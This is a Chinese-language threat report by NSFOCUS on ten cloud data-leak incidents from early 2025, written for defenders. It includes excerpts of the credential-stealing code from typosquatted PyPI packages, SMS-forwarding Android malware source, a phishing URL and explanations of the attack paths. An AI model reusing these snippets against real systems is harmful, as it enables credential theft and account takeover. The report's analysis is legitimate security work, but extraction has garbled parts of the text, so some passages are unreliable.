




版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
全球云上数据泄露风险分析报告(第五期)绿盟科技集团股份有限公司(以下简称绿盟科技),成立于2000年4月,总部位于北京。公司于2014年1月29日起在深圳证券交易所创业板上市,证券代码:300369。绿盟科技在国内设有40多个分支提供全线网络安全产品、全方位安全解决方案和体系化安全运营服务。公司在美国硅谷、日本东京、英国伦敦、新加坡设立海外子公司,深入开展全球业务,打造全球网络安全行业的中国品牌。NSFOCUSXINGYUNLAB绿盟科技星云实验室专注于云计算安全、云原生安全、解决方案研究与虚拟化网络安全问题研究。基于laaS环境的安全防护,利用SDN/NFV等新技术和新理念,提出了软件定义安全的云安全防护体系。承担并完成多个国家、省、市以及行业重点单位创新研究课题,已成功孵化落地绿盟科技云安全解决方案、绿盟科技云原生安全解决方案。版权声明本文中出现的任何文字叙述、文档格式、插图、照片、方法、过程等内容,除另有特别注明,版权均属绿盟科技所有,受到有关产权及版权法保护。任何个人、机构未经绿盟科技的书面授权许可,不得以任何方式复制或引用本文的任何片断。9事件八.印度尼西亚共和国银行使用的微软云盘Onedrive暴露事件九.爬虫数据库CommonCrawl中泄露约12000个DeepSeek相关凭证事件十.Daytrip使用的Mongo数据库服务因错误配置导致超过47万用户旅行数据泄露02安全建议2.2针对系统入侵的安全建议2.3针对基础Web应用类攻击的安全建议2.4针对社工类攻击的安全建议03总结04参考文献前言本报告为绿盟科技星云实验室发布的第五期云上数据泄露简报,聚焦2025年1-2月期间的全球云上数据泄露事件。鉴于多数事件成因相似,我们精选了10起典型案例进行深入分析,以全面呈现云上数据泄露的整体态势。值得注意的是,其中5起事件与大模型技术密切相关,凸显了随着Deepseek、Ollama等开源模型的广泛应用,云上数据安全正面临显著的“AI驱动型风险”。从事件成因来看,6起事件源于配置错误,2起由社工攻击引发,1起涉及Web基础类攻击,另1起则为系统入侵所致。由此可见,租户配置错误仍是导致数据全球1-2月云上数据泄露典型事件解读2事件一:Deepseek公司使用的Clickhouse数据库存在配置错误导致出现严重聊天数据泄露2025年1月29日泄露规模:百万行的日志流,包含聊天历史记录,密钥等敏感信息Clickhouse服务,并确定该服务属于我国AI初创公司深度探索(DeepSeek)。Clickhouse能够对底层的数据库中的数据进行访问,利用该Clickhouse服务,Wiz安全研究员发现了约一百万行DeepSeek的日志流,包含历史聊天记录,密钥等其他敏感信息。发现问题后,Wiz安全研究团队立即向DeepSeek通报了这一问题,DeepSeek立即对其暴露的Clickhouse服务进行了安全处置。ClickHouse是一个开源的列式数据库管理系统(DBMS),专为在线分析处理(OLAP)设计。它能够高效处理大规模数据,支持实时查询和分析,适用于日志分析、用户行为分析等场景。ClickHouse存在未授权访问漏洞,对于一个未添加任何访问控制机制的ClickHouse服务,任意用户可以通过该服务暴露的API接口执行类SQL命令。本次事件中,Wiz安全研究团队通过技术手段探测了约30个DeepSeek面向互联网的子域名的80和443端口。这些暴露服务大多是托管聊天机器人界面、状态页面和API文档等资源,也都没有相关安全风险。为了进一步探寻DeepSeek的暴露风险,Wiz安全研究团队将探测范围扩大到了除80、443端口之外的非常规端口,如8123、9000端口等。最终,他们发现了非常规端口的多个子域名下均有暴露服,如:·http://oauth2callback.deepseek.c·http://oauth2callback.deepseek.c3*NSFOCUS|全球云上数据泄露风险分析简报(第五期)在确定这几个暴露的服务为安全研究团队通过ClickHouse服务的API对底层的数据库进行查询测试,包含查询数据库、查询数据库中的表,如下图所示:△NotSecure:9000/?View△NotSecure:9000/?query=SHOW%20DATABASESPort9000isforclickhouse-clientprogranYoumustuseport8123forHTTP.DViow十INFORMATIONSCHEMAdefautZoom图1.疑似Clickhouse泄露数据1后图2.疑似Clickhouse泄露数据24从2025年1月6日起,存在泄露风险的日志信息包含对各种内部DeepSeek技术子技术利用方式T1590收集受害者网络信息.002域名解析攻击者可能利用主域名对目标进行子域名爆破。T1046网络服务发现N/A攻击者确定目标域名开放的端口和服务。T1106原生接口N/A攻击者可能利用ClickhouseAPI与数据库交互。T1567通过Web服务外泄N/A攻击者可能利用ClickhouseAPI进行数据窃取。database-leak事件二:美国广播公司ValleyNews使用的AWSS3对象存储存在配置错误导致大量敏感信息泄露2025年2月4日泄露规模:超过180万份文件泄露,其中超过100万个是求职者的简历,里面包含姓名、电话号码、电子邮箱、家庭住址等个人敏感信息2025年2月,Cybernews研究团队发现美国广播公司ValleyNewsLive使用的AmazonAWSS3存储桶存在配置错误,导致存储桶内超过180万份文件存在泄露风险,其中超过100万个是求职者的简历,甚至超过一半的曝光简历跨域多年,时间跨度从2017年到2024年不等。这些简历中包含了求职者的个人姓名、电话号码、电子邮箱、家庭地址、出生日期、国籍和出生地、社交媒体链接、工作经历和学历等个人敏感信息。这些个人信息可能会导致被暴露者的身份存在盗用风险。5 事件分析:AmazonS3是一项面向公有云的对象存储服务,可通过AmazonS3随时在Web上的任何位置存储和检索的任意大小的数据。其提供了可配置的安全性、数据保护、合规性和访问控制功能保护用户的数据安全。如果使用者权限配置不当,对象存储服务中的数据将公开给所有人访问。导致此次数据泄露事件的主要原因是服务配置错误。ValleyNewsLive在使用AmazonS3对象存储服务时没有配置安全的访问控制策略,导致任何人均可公开访问该对象存储服务。VERIZON事件分类:MiscellaneousErrors(杂项错误)6所用MITREATT&CK技术:技术子技术利用方式T1593搜索开放网站/域.002搜索引擎攻击者可能利用网络空间搜索引擎进行情报收集。T1133外部远程服务N/A攻击者识别暴露服务中的AmazonS3对象存储服务。T1587开发功能.004利用工具攻击者开发对AmazonS3对象存储服务进行安全测试的工具。T1530云存储中的数据N/A攻击者访问AmazonS3对象存储服务的数据。T1567通过Web服务外泄N/A攻击者可能利用Web服务进行数据窃取。参考链接:/security/valley-news-live-data-事件三:攻击者通过非法上传DeepSeek恶意依赖包引泄露规模:部分用户凭据及环境变量事件回顾:首次上传两个恶意python包(deepseekVamsi2projectsPythonclientforDeepSeekAIAPI-accesslargelanguagemodelsandAlservicesdeepseeekLastdeepseeekLastreleased21minutesagodeepseeekAPIclient7*NSFOCUS|全球云上数据泄露风险分析简报(第五期)同日,PositiveTechnologiesExpertSecurityCenter(PTESC)威胁情报团队通过系统捕获到异常活动同日,PositiveTechnologiesExpertSecurityCenter(PTESC)技术团队分析验证并通知PyPI管理员同日,PyPI管理员删除了以上两个恶意python包并通知了PTESC经统计,在恶意python包被上传后,全球多达17个国家,通过各种下载渠道共下载恶意软件高达200多次,目前两个恶意软件包已被隔离Released:28minutesagoThesedetoilshovebeenverfiedbyBvEIThesedetoilshavenotb。deepseekai,ai,LLM,languageoProvides-Extra:devIntendedAudienceDevelopersThisThisprojecthasbeenquarantined.PyPIAdminsneedtoreviewthisprojectbeforeitcanberestored.Whileinquarantine,theprojectisnotinstallablebyclients,andcannotbebeingmodifiedbyitsmaintainers.Readmoreintheprojectinquarantinehelparticle.DeepSeekAIPythonClientAPythonclientlibraryforinteractingwithDeepSeekAI'sAPIservices.ThispackageprovidessimpleandintuitiveaccesstoDeepSeek'slargelanguagemodelsandAlcapabilities.·Easy-to-useinterfaceforDeepSeekAIAPI·Supportfortextgenerationandcompletion·Built-inerrorhandlingandratelimiting·Comprehensivedocumentationandexamplespippipinstalldeepseekai图5.被隔离的软件包事件分析:据PTESC技术团队反馈,恶意用户上传的软件包中主要涉及信息收集和环境变量窃取等功能,窃取数据包括如数据库凭据、API、S3对象存储访问凭证等。当用户在命令行中运行Deepseek或Deepseekai时,将执行恶意载荷。8全球1-2月云上数据泄露典型事件解读33……packages=find_packages(exclude=['ez_setup','examples','tests',·'tests.*',·'release']),uF36...··'consol37.·'deepseekai=deepseekai.main:main',LF11import·requestsLF4#·Suppress·all·warningsLF5warnings.filterwarnings("ignore")LF8·url·=·"LF""LF10……userid·=·os.popen('id').read().strip()·#·Attempt·to·get·user·ID·with·id·commandur12………user_id·=·os.popen('who14·hostname·=·Os.uname().nodename··#·Get·system·hostnameLF15env·=·Os.getenv("ENV","prod")·#·Get·environment·variable·or·default·to·prodLr19….except·requests.exceptions.RequestException:LF20··pass··#·Silently·ignore·any·request·errorSLF图7.恶意软件包中的载荷从以上载荷中不难看出攻击者使用了PipeDream,作为被盗数据命令控制服务器,回顾整个事件,我们认为时间成因可汇总为以下几方面:依赖混淆攻击:利用企业私有包与公共仓库同名包优先级差异软件包命名仿冒策略:模仿知名Al公司Deepseek品牌名称9PyPI注册机制漏洞:未有效验证开发者身份与包名合法性开发者安全意识不足:易误装名称相近的恶意包技术子技术利用方式T1593搜索公开可用的python依赖仓库,找到PyPIT1195利用恶意软件包装为Python依赖,上传至PyPI仓库,引发供应链攻击T1059攻击者在恶意包中植入了恶意代码,用户执行后便会泄露环境变量、凭证等信息,并通过攻击者搭建的PipeDream进行敏感数据外泄T1041N/A通过C2通道外泄用户环境变量、凭证的敏感信息/analytics/pt-esc-threat-intelligence/malicious-packages-deepseeek-and-deepseekai-published-in-python-泄露规模:约20亿大模型Token遭到非法利用2024年5月,Sysdig威胁研究团队发现一种针对大模型的新型网络攻击方式——LLMjacking,又称LLM劫持攻击。2024年9月,Sysdig威胁研究团队表示,LLM劫持攻击攻击的频率和普及正在增加。DeepSeek也逐渐成为被攻击对象。2024年12月26日,DeepSeek发布了高级模型DeepSeek-V3。几天后,Sysdig威胁研究团队发现DeepSeek-V3已在HuggingFace上托管的OpenAil反向代理(ORP)项目中所实现。2025年1月20日,DeepSeek发布了一种称为DeepSeek-R1的推理模型。次日,支持DeepSeek-R1的ORP项目已经出现,多个ORP已填充了DeepSeekAPI密钥,并且已有攻击者开始利用这些密钥。在Sysdig威胁研究团队的研究工作中,已发现所有ORP非法利用的大模型Token总数已超过20亿。LLM劫持攻击指攻击者利用窃取的云凭证,针对云托管的LLM服务发起的劫持攻击。攻击者利用OAIOAI反向代理和窃取到的云凭证,将受害者订阅的云托管LLM服务的访问权限进行出售。该攻击可能导致受害者承受巨额的云服务成本。OAI反向代理指LLM服务的反向代理,OAI反向代理可以帮助攻击者集中管理对多个LLM账户的访问,而不暴露底层的凭据和凭据池。利用OAIOAI反向代理,攻击者能够在没有支付相应费用的情况下运行高成本的LLM(如DeepSeek)。攻击者通过反向代理访问这些LLM,实际执行任务和消耗计算资源,从而绕过了合法的服务收费。反向代理机制充当了中介角色,重定向请求并隐藏了攻击者的身份,使其能够在不被察觉的情况下滥用云计算资源。OpenAIOpenAI_GPT_4OAzure-DALL-EUsers'promptsAWS-BedrockGCP-VERTEXAl6OAI-Reverse-ProxyConsumeTokensSsOAI反向代理是实现LLM劫持攻击的必要条件,而实现LLM劫持攻击的关键是如何窃取到正常用户所购买的各类LLM服务的凭证、密钥等。攻击者对凭证的窃取往往是通过传统的Web服务漏洞、配置错误等方式(如Laravel框架的CVE-2021-3129漏洞等)。一旦获得这些凭证,攻击者便可以访问云环境中的LLM服务,例如AmazonBedrock、GoogleCloudVertexAl等。AWSAWSAWSCreds<cve-2021-1329>Sysdig威胁研究团队研究表名表明,攻击者可以在短短几小时内使受害者的消费成本飙升至数万美元,甚至在某些情况下,日消费成本可高达$100,000。这种攻击不仅仅是为了获取数据,更多的是为了通过出售访问权来获取经济利益。VERIZON事件分类:BasicWebApplicationAttacks(基础Web应用类攻击)所用MITREATT&CK技术:技术子技术利用方式T1593搜索开放网站/域.002搜索引擎攻击者利用OSINT方法在互联网中收集暴露服务信息。T1133外部远程服务N/A攻击者识别暴露服务中存在漏洞。T1586泄露账户.003云账户攻击者利用漏洞窃取LLM服务或云服务凭证。T1588获取能力.002工具攻击者部署开源OAI反向代理工具。T1090代理.002外部代理攻击者利用OAI反向代理软件集中管理多个LLM账户的访问。T1496资源劫持N/A攻击者利用访问LLM注入攻击进行LLM资源劫持。参考链接:/blog/llmjacking-targets-deepseek/事件五:大模型集成工具OmniGPT数据泄露:超30000用户数据在暗网公开售卖泄露规模:超过30000名用户的个人信息,包括电子邮件、电话号码、API密钥、加密密钥、凭证及账单信息等。2025年2月12日,SyntheticEmotions在BreachForums发布了一篇文章,如图10所示,攻击者声称自己窃取了OmniGPT平台的敏感数据,并将其出售。文章中得知,泄露的数据包括OmniGPT平台上30,000多名用户的邮件、电话号码、API密钥、加密密钥、凭证、账单信息及用户与聊天机器人的所有对话记录(超过3400万行)。此外,上传到平台的文件链接也被泄露,其中一些文件同样包含敏感信息,如凭证和账单资料。尽管此次泄露的具体攻击路径未被明确披露,但从泄露的数据类型和范围来看,攻击者可能通过SQL注入、API滥用或社会工程学攻击等手段获取了后台数据库的访问权限。当然,OmniGPT平台也可能存在配置不当或漏洞,导致攻击者能够绕过认证控制,直接访问包含用户信息的数据库。另外,二次泄露的“Messages.txt”文件中包含了API密钥、数据库凭证和支付卡信息等,这些信息可能被用于进一步入侵其他系统或篡改数据。平台用户上传的部分文件中含有涉及企业机密、项目资料等敏感信息,若这些文件被恶意利用,亦可能导致更多业务运营遭受影响。此次泄露事件为整个行业敲响了警钟,提醒所有用户应更加注重数据安全和隐私保护,尤其是在使用AI和大数据平台时,应制定严格的数据使用政策,并对敏感数据进行加密、最小化或匿名化处理。否则,一旦发生类似的数据泄露,将可能导致企业面临法律、声誉和经济的多重损失。VERIZON事件分类:MiscellaneousErrors(杂项错误)技术子技术利用方式T1071应用层协议.001HTTP/S攻击者可能通过利用OmniGPT的Web接口与被盗数据进行交互,访问泄露的用户信息和敏感数据。T1071应用层协议.002API接口泄露的API密钥和数据库凭证使攻击者能够通过平台的API接口进一步访问系统,执行未经授权的操作。T1071应用层协议.002服务执行攻击者可能会滥用系统服务或守护程序来执行命令或程序T1020自动泄露.003文件传输泄露的文件链接和用户上传的敏感文件可能成为攻击者访问和下载的目标,从中获取更多敏感数据并利用这些数据进行后续攻击。T1083文件和目录访问001访问敏感文件泄露的文件包含敏感数据(如凭证、数据库信息),攻击者可能通过访问这些文件来进一步获取关键的业务信息和用户数据。/blog/omnigpt-leak-risk-ai-data/https://www.CS/article/3822911/hacker-allegedly-puts-massive-omnigpt-breach-data-for-sale-on-the-dark-web.html事件六:印度新型恶意软件攻击致50000银行用户信息泄露泄露规模:约50000名用户的个人和财务敏感信息2025年2月6日,zLabs安全研究团队发现包含印度银行在内的多个用户遭遇了一场名为“FatBoyPanel”的恶意软件攻击。该恶意软件由约900个变种组成,旨该恶意软件活动暴露了大约50000名用户的敏感数据,包括来自印度银行的短信、银行详细信息、卡详细信息和政府颁发的身份证明详细信息。zLabs宣称,其安全团队已经追踪并识别了超过1000个与此攻击活动相关的电话号码,这些信息将上报当地执法机构,以追踪攻击者。此事件中,攻击者通过社交平台(WhatsApp)分发伪装成银行应用的恶意全球1-2月云上数据泄露典型事件解读APK文件。如图11所示,该伪装界面通常与真实银行界面非常相似,一旦恶意软件被安装,很难以让普通用户察觉到其恶意行为。可TTHffnFPMKOSANSAMMANNIDHMalwareAttackingUsersofIndianBanksWelcometoPersonalIntermetBanking(CARE:Usemameandpasswordarecasesensitve.)Aφo2φ图11.伪装的恶意软件用户在安装恶意软件后,恶意软件会请求获取手机的短信权限,攻击者利用短信权限拦截并窃取用户收到的短信,此外,恶意软件还使用了Firebase和短信转发技术来传输窃取的信息,这使得攻击者能够实时获取用户的验证信息,进而实施资金转账等非法操作。publicpublicclassReceiveSmsextendsBroadcastReceiver{@Override//android.content.BroadcastReceiverSmsManager.getDefault().sendTextMessage(this.stringNumber,null,s,null,nul}catch(Exceptionexception0){exception0.printStackTrace();publicvoidonReceive(Contextcontext0,Intentintent0){this.androidID=Settings.Secure.getString(context0.getContentResolver(),"android_id");if(intent0.getAction().equals("vider.Telephony.SMS_RECEIVED")){Bundlebundle0=intent0.getExtras();0bject[]arr_object=(Object[])bundle0.get("pdus");SmsMessage[]arrsmsMessage=newSmsMessage[arrobject.length];for(intv=0;V<arrobject.length;++v){SmsMessagesmsMessage0=SmsMessage.createFromPdu(((byte[])arr_object[v]));arrsmsMessage[v]=smsMessage0;smsMessage⁰.getOriginatingAddress();Strings=arrsmsMessage[v].getMessageBody();this.androidID="";}privateStringstringNumber;StringandroidID;图12.恶意利用源码参考VERIZON事件分类:SystemInt技术子技术利用方式T1456账户利用N/A通过钓鱼消息分发恶意APK(Mobile)T1546事件触发执行.016安装程序包诱导用户安装恶意应用-T1656仿冒银行应用T1111多因素身份验证拦截N/A拦截用户验证短语T1041通过C2通道进行泄漏基于Firebase的Web协议C2通信,窃取短信和身份信息。/new-malware-attacking-users-of-事件七:攻击者通过设备代码身份验证入侵Microsoft3652025年2月17日泄露规模:未明确具体数量,描述为"多组织受害",泄露内容包括Microsoft3652025年1月初:Volexity发现多个俄罗斯威胁团队利用设备验证码发起针对Microsoft365的社工攻击。2025年1月中旬:确认攻击团队包括Cozylarch(APT29关联)、UTA0304和UTA0307,锁定其目标为劫持Microsoft365账户。2025年2月底:攻击者仿冒美国国务院、乌克兰国防部等机构官员身份,通过钓鱼邮件诱导受害者访问伪造URL。受害者被引导至伪装成"微软团队会议"或"安全聊天室"的钓鱼页面,输入设备验证码后触发账户认证。2025年2月17日至今:攻击者持续通过窃取的Token横向渗透至OneDrive全球1-2月云上数据泄露典型事件解读等关联服务,事件仍在调查中。事件分析:Microsoft365是微软的云端办公室方案,包括免费的线上OfficeOnline、线上会议MicrosoftTeams、管理信件的OutlookWebApp、建立小组沟通网站的SharePointOnline等。据Volexity的安全研究人员透露,此次攻击事件的攻击路径如下所示:generateDeviceCodeThreatActor-SendsSends>*******Accessgraph.microso(downloadingfiles,emails)forarbitraryinteractionwithAccessgraph.microso(downloadingfiles,emails)图13.事件攻击路径图攻击者首先向Microsoft365发起合法请求,生成有效的设备验证码(DeviceCode)。该验证码默认有效期为15分钟,攻击者需在此窗口期内完成后续攻击操作。*NSFOCUS|全球云上数据泄露风险分析简报(第五期)钓鱼诱导阶段基于前期对目标的信息收集(如邮箱、社交画像),攻击者将生成的DeviceCode嵌入钓鱼邮件中,伪装成"加入微软团队会议"或"进入安全聊天室"等诱导性话术。JointhemeetingFororganizers:Meetingoptions图14.钓鱼邮件内容邮件内设置"JointheMeeting"等高仿按钮,点击后跳转至攻击者架设设置的伪造微软认证页面(示意图如下)。SecuritycheckSecuritycheck08https//connect-71qpages.dev/ink?t=MicrosoftTeams&l=dGVhbXMu☆MicrosoftGothroughaquickcheck.Copythecodebelowandenteritonthenextstep.图注15.攻击者伪造的微软安全检查页面全球1-2月云上数据泄露典型事件解读交互验证劫持阶段动态DeviceCode机制:伪造页面具备动态生成新DeviceCode的能力,确保每次访问时提供有效验证码(与第一步生成的初始DeviceCode形成独立链路)。双重页面诱导:受害者点击"Next"后,系统自动开启新浏览器标签页加载真实微软设备认证页面(如/devicelogin),同时伪造页面通过脚本保持前台显示以维持交互连续性。认证缓存利用:受害者受诱导在真实验证页面输入伪造页面提供的DeviceCode时,其本地浏览器缓存的微软凭证可能触发自动授权,导致攻击者实时获取微软OAuth令牌(Token)。权限滥用与横向渗透阶段攻击者利用窃取的Token,通过MicrosoftGraphAPI或其他接口访问受害者Microsoft365账户数据(邮件、OneDrive文件等)。为扩大攻击面,进一步利用账户权限进行横向移动,例如:访问关联的云存储服务(如OneDrive、SharePoint)劫持企业内部协作权限(Teams会议、共享文档)通过邮箱权限发起次级钓鱼攻击(APT渗透)该事件涉及的loCResolutionforknownUTA0304indicatorResolutionforknownUTA0304indicatorhostnameSuspectedUTA0304hostnameSuspectedUTA0304hostnameUTA0304hostnameUTA0304hostnameSuspectedUTA0304hostnamehostnameDomainusedinUTA0307phishing图16.事件涉及PoC所用MITREATT&CK技术:技术子技术利用方式T1593搜索开放网站/域.002搜索引擎攻击者可能利用OSINT方法进行情报收集。T1566网络钓鱼.002鱼叉是网络钓鱼链接攻击者通过构造钓鱼邮件进行社工攻击。T1204用户执行.001恶意链接受害者通过点击邮件中的恶意链接,访问攻击者精心构造的仿冒系统,从而拿到微软身份验证后返回的Token信息。T1534内部鱼叉式钓鱼攻击N/A攻击者通过Microsoft365账户的Token访问账户下的微软服务,从而进行数据窃取等恶意行为。T1567通过Web服务外泄N/A攻击者可能利用Web服务进行数据窃取。参考链接:https://wwW./blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication//en-us/security/blog/2025/02/13/storm-2372-conducts-device-code-phishing-campaign/事件八:印度尼西亚共和国银行使用的微软云盘Onedrive暴露泄露规模:泄露了印度尼西亚多地银行分行客户的财务信息事件回顾:2025年2月,绿盟科技创新研究院发现一个OneDrive的在线excel文档中泄露了印度尼西亚多地银行分行客户的详细财务信息:包括账户号码、欠款余额、逾期天数、业务类型等,暴露了客户的贷款信息。这类数据泄露可能会影响客户的金融状况和个人信用。SUs图17.疑似Onedrive泄露数据事件分析:OneDrive是微软推出的云存储服务,允许用户存储、同步和共享文件。它提供个人、企业级云存储空间,可自动同步Windows、Mac、1OS、Android等设备上的文件,集成了MicrosoftOffice文档,可以无缝协作、在线编辑。并且可以通过链接共享文件,可设置访问权限:任何人、仅限组织中已具备访问权限的人或使用姓名、组织或电子邮件与组织内部或外部的特定人员共享,还可进一步设置操作权限(仅查看、可编辑)。导致此次数据泄露事件的主要原因是在共享文件时错误地将访问权限设置为与任何人共享,这样任何人只要知道该分享链接,则无需登录也可访问到该文件内容。因此在对一些含有较敏感数据的文件进行共享时,要注意访问权限的设置,避免敏感信息的泄露。VERIZON事件分类:MiscellaneousErrors(杂项错误)所用MITREATT&CK技术:技术子技术利用方式T1593搜索开放网站/域.002搜素引擎攻击者可能利用网络空间搜索引擎进行情报收集。T1133外部远程服务N/A攻击者识别暴露服务中的微软云盘(OneDrive)T1587开发功能.004利用工具攻击者开发对暴露服务进行安全测试的工具。T1530云存储中的数据N/A攻击者访问微软云盘(OneDrive)的数据。T1567通过Web服务外泄N/A攻击者可能利用Web服务进行数据窃取。中泄露约12000个2025年2月28日泄露规模:约11,908个有效的DeepSeekAPI密钥、凭证和身份验证令牌事件回顾:Truffle安全团队利用开源工具TruffleHog对爬虫数据库——CommonCrawl中2024年12月的400TB数据(涵盖来自4750万台主机的26.7亿个网页)进行了扫描。扫描结果表明:约11,908个有效的DeepSeekAPI密钥、凭证和<input<inputtype="hidden"name<inputtype="hidden"name="aWSAccessKeyId"value="AKIAJKL<inputtype="hidden"name="secretAccessKey"value="Kpb1Q<inputtype="hidden"name="associateTag"value="<inputtype="hidden"name="version"value="2010-09-01"<inputtype="hidden"name="responseGroup"value="Small,<inputtype="hidden"name="amazonI约1,500个MailchimpAPI密钥被直接硬编码在JavaScript代码中。Mailchimp事件分析:CommonCrawl是知名的非盈利网络爬虫数据库,定期抓取并公开互联网网页数据。CommonCrawl中存储于90,000个WARC(WebARChive)文件中,完整保存了爬取网站的原始HTML、JavaScript代码及服务器响应内容。CommonCrawl中的数据集常被用来进行AI模型的训练。因此,Truffle安全团队的研究内容揭示了一个日益严重的问题:使用带有漏洞的语料库进行模型训练会使得模型继承其存在安全漏洞。即使DeepSeek等其他大模型在训练和应用过程中利用了额外的安全措施,但训练语料库中的硬编码漏洞的普遍存在会使大模型认为这种“不安全”的做法是正常的。除此之外,硬编码这种不安全的编码风格是一个老生常谈的问题。这种漏洞的成因很简单,也很普遍,但带来的风险确实十分严重的。硬编码漏洞会造成数据泄露、服务中断、供应链攻击等。在大模型技术快速发展的今天,凭证的泄露会带来一种新型攻击——LLM劫持。LLM劫持攻击指攻击者利用窃取的云凭证,针对云托管的LLM服务发起的劫持攻击。攻击者利用OAI反向代理和窃取到的云凭证,将受害者订阅的云托管LLM服务的访问权限进行出售。该攻击可能导致受害者承受巨额的云服务成本。技术子技术利用方式T1596搜索开放技术数据库.005扫描数据库攻击者在公开爬虫数据库中进行信息收集。T1588获取能力.002工具攻击者部署敏感信息发现工具。T1586泄露账户.003云账户攻击者利用敏感信息发现工具发现公开数据库中的敏感凭证类信息。T1090代理.002外部代理攻击者利用OAI反向代理软件集中管理多个LLM账户的访问。T1496资源劫持N/A攻击者利用访问LLM注入攻击进行LLM资源劫持。事件十:Daytrip使用的Mongo数据库服务因配置错误配置导致超过47万用户旅行数据泄露2025年1月28日泄露规模:超过470K用户记录以及762K的详细旅行订单。2024年10月21日,Cybernews团队发现Daytrip使用的Mongo数据库泄露了用户旅行记录信息,包括姓名、PayPal电子邮件、电子邮件、电话号码、出生日期、部分付款详情、账单信息、取车和还车地址、乘客详细信息、费用、VIP标志等信息。2024年10月21日,Cybernews将此安全问题通知至Daytrip,Daytrip声称管理该Mongo数据库的为其供应商;2024年10月24日,Daytrip通知其供应商并关闭了Mongo数据库的对外2025年1月28日,Cybernews公开了整个事件。事件分析:Daytrip为国际旅客提供车辆租赁服务。该公司目前在120多个国家开展业务,并计划向全球扩张。MongoDB是一种面向文档的数据库系统,广泛用于处理非结构化数据。MongoDB社区版的默认配置不会启用访问控制和身份验证机制,这意味着数据库在安装后,如果没有进一步进行安全配置,数据库里的数据将公开给所有可以访问的人。导致此次数据泄露事件的主要原因是服务配置错误,包括:·未设置访问控制列表(ACL),使得任何人可以通过公开的IP地址访问。●未启用认证机制,使得任何可以访问数据库的人可以操作数据库中的数据。这些配置错误让攻击者能够轻松使用扫描工具发现并访问未保护的数据库实例,从而窃取其中的敏感信息。全球1-2月云上数据泄露典型事件解读"passwordHash""lastName":"otherPhoneNum""profilePhoto":nu"mangopayInformation":[{]图19.疑似Mongo数据库信息泄露所用MITREATT&CK技术:技术子技术利用方式T1593搜索开放网站/域.002搜索引擎攻击者可能利用网络空间搜索引擎进行情报收集。T1133外部远程服务N/A攻击者识别暴露服务中的MongoDB服务。T1587开发功能.004利用工具攻击者开发对MongoDB服务进行安全测试的工具。T1530云存储中的数据N/A攻击者访问MongoDB服务的数据。T1567通过Web服务外泄N/A攻击者可能利用Web服务进行数据窃取。参考链接:/s安全建议前文我们对全球1-2月云上数据泄露典型事件进行了详细解读,如下图所示,从事件分类模式上看,杂项错误中涵盖的配置错误是导致数据泄露的主要原因,占比高达60%。导致的数据泄露,社工类占比约20%,剩余Web基础类攻击和系统入侵各占比10%。云数据泄露事件类型分布图20.云数据泄露事件类型分布2.1针对杂项错误类的安全建议1.通过配置防火墙、访问控制列表(ACL)、角色访问控制(RBAC)或者服务监听策略等方式缩小服务暴露范围。例如通过配置bindlp参数,限制MongoDB只监听特定的私有网络地址。如图121所示,在mongod.conf中设置:netnet:bindIp:,#仅允许本地和指定IP访问图21.MongoDB监听配置2.禁止服务匿名访问策略,如修改mongod.conf文件的"authorization"为"enabled",禁止MongoDB匿名访问;3.避免将对象存储服务的访问控制权限设置为公共访问,或开启云服务商提供的类似“阻止公共访问”等功能。*NSFOCUS|全球云上数据泄露风险分析简报(第五期)et/华北2(北京)收通使用权阳检制文州警确定开启吧止公共访问?变件树表超让公惊六全业对05回原行集对●开公井示开产止公开,时网态墙口有的公天读开滨和士南公开居周涯的项需塔dos),开不北所建认e正号力不理公地动同的业隔。在它需理公地动同.请加开常见问攀.读写奶限症开上开右习,人以开止公共石rl5施题频确认开B止公开站同生开止公井买纳网刺u能然不C蛇图22.配置对象存储为私有访问4.监控和记录所有访问请求,并配置异常活动告警。如公有云服务可直接开启云审计和告警服务,例如,使用awscloudtrail服务、阿里云审计日志服务等。5.通过配置防火墙、访问控制列表(ACL)、角色访问控制(RBAC)或者服务监听策略等方式缩小服务暴露范围。6.通过设置微软Onedrive的分享链接为”仅限已经具有访问权限的人“访问避免文件被公开链接设置我的笔记本链接适用于任何人与组织中已具有访问权限的人员重新共享。仅限已经具有访问权限的人①W你选择的人使用姓名、组或电子邮件与你在你的组织内部或外部选择的特定人员共享。◎更多设置可编辑应用应用图23.微软云盘文件分享权限设置2.2针对系统入侵的安全建议1.设置网络隔离策略,如根据资产或业务设置多个微分段网络,针对每个微分段设置白名单放行规则等;2.启用多因素身份验证(MFA),增强高敏感系统和数据的访问控制;定期轮换服务账户的访问密钥和API密钥,并及时撤销不再使用的密钥。可利用云厂商的密钥管理服务(KeyManagementServiceKMS);3.实施集中凭证管理,防止凭证泄露。如使用AWSSecretsManager或4.定期为员工提供云安全培训,内容涵盖配置管理、数据保护、凭证管理、安全监控和应急响应,提升开发人员的安全意识,确保运维人员能够快速应对泄露事件;5.自动撤销离职员工对系统的访问权限,包括云
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 2024年特许金融分析师考试动态跟踪和分析试题及答案
- 有效应对的2024年CFA考试试题及答案
- 食品安全研学课
- 2024年特许金融分析师考试课件试题及答案
- 记忆CFA考试内容的有效策略试题及答案
- CFA复习技巧试题及答案揭秘
- 2024年CFA考试备考资料试题及答案
- 餐厅运营部年终总结
- 特许金融分析师考试学习评估试题及答案
- 2024年特许金融分析师考试挑战和对策试题及答案
- 2024年甘肃白银有色集团股份有限公司招聘笔试参考题库含答案解析
- 2016-2023年郑州电力高等专科学校高职单招(英语/数学/语文)笔试历年参考题库含答案解析
- 化学学科心理健康教育
- 梁湘润《子平基础概要》简体版
- 人名调解员培训课件
- 大数据导论之大数据应用
- 能源托管服务投标方案(技术方案)
